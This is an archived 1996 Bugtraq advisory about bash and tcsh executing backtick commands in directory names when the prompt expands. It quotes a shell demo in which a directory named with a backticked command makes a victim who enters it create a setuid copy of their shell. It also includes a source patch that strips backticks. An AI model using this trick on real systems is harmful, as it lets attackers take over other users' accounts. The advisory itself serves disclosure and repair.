Home page logo

bugtraq logo Bugtraq mailing list archives

Vulnerability in expansion of PS1 in bash & tcsh
From: bethery () info enserb u-bordeaux fr (BETHERY Olivier)
Date: Thu, 19 Sep 1996 20:52:26 +0200

test (butafuco () MC NET)
Fri, 13 Sep 1996 09:03:00 -0500

A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
out with BSDI anyway.) that allows the execution of arbitrary commands
when changing into directories that are enclosed with back tic's.  The
problem might also prove to be quite bad to tcsh scripts that find
themselves changing into directories on the fly.

Here is probably one of the dumbest methods possible that could be used to
exploit this weakness.

----------------------------Cut to Bad guy--------------------------------

jim% whoami
Evol bad guy
jim% mkdir /tmp/\`source\ .WaReZ\`
jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
jim% chmod +x /tmp/*W*/.WaReZ

---------------------------Cut to unsuspecting foo------------------------

jim% whoami
Unsuspecting foo
jim% echo $SHELL
jim% I just like to check that sometimes.
jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
jim% cd /tmp
jim% ls

`source .WaReZ`

jim% OH BOY!!! the jack pot!
jim% cd *WaReZ*
jim% ls

jim% oh, oh well maybe I'll check later...
jim% cd $HOME

----------------------------Cut to More Bad guy--------------------------

jim% ls -a /tmp/*W*/


jim% /tmp/*W*/.24753
unsuspecting foo
$ hah.
---------------------------End Unix Parable-------------------------------

The antiquotes launch the expansion procedure so the expression
between quote is evaluated. This expansion is running when
PS1 variable need to be evaluate, with a cd command for example.
So if the string between quotes is an command line, this line is
with the UID of the user who is doing the cd command.

A first fix for bash ( not tested with tcsh ):
Do not use PS1 and do not include . in your path

Second avaible fix for bash ( not tested with tcsh ):
( First Release, can be improve )

*** bash-1.14.7/parse.y Mon Aug 26 17:15:55 1996
--- bugfixed-bash/bash-1.14.7/parse.y   Thu Sep 19 16:20:58 1996
*** 2719,2727 ****
  #define EFFICIENT
  #ifdef EFFICIENT
                char *polite_directory_format (),
                temp = get_string_value ("PWD");
                if (!temp)
                  getwd (t_string);
--- 2719,2733 ----
  #define EFFICIENT
  #ifdef EFFICIENT
                char *polite_directory_format (),
!               char *mutmp;
                temp = get_string_value ("PWD");
!       /* BUGFIX -mu */
!               mutmp=temp;
!               while (*mutmp != '\0') {
!                 if (*mutmp == '`')
!                   *mutmp='%';
!                 mutmp++;
!               }
                if (!temp)
                  getwd (t_string);

email: bethery () info enserb u-bordeaux fr

  By Date           By Thread  

Current thread:
  • Vulnerability in expansion of PS1 in bash & tcsh BETHERY Olivier (Sep 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]